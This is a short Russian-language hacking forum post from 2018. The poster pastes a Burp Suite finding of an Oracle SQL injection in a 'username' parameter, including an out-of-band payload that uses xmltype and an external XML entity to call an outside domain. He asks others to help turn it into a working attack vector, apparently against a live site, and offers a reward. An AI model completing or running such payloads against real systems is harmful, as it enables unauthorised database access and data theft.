Показать сообщение отдельно

  #4  
Старый 17.06.2018, 17:57
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
Провел на форуме:
97114

Репутация: 24


По умолчанию

Что за дич нашел бурп как раскрутить? кто может помоч?

Цитата:
Сообщение от None  
Issue detail
The
username
parameter appears to be vulnerable to SQL injection attacks. The payload
'||(select extractvalue(xmltype('%tuxjp;]>'),'/l') from dual)||'
was submitted in the username parameter. This payload injects a SQL sub-query that calls Oracle's xmltype function to evaluate some data as XML. The supplied XML defines an external entity that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed.
Изучил https://exploitstube.com/sql-injecti...in-oracle.html

Помогите вектор наити а то на снифере приходи пустота, скину прив
 
Ответить с цитированием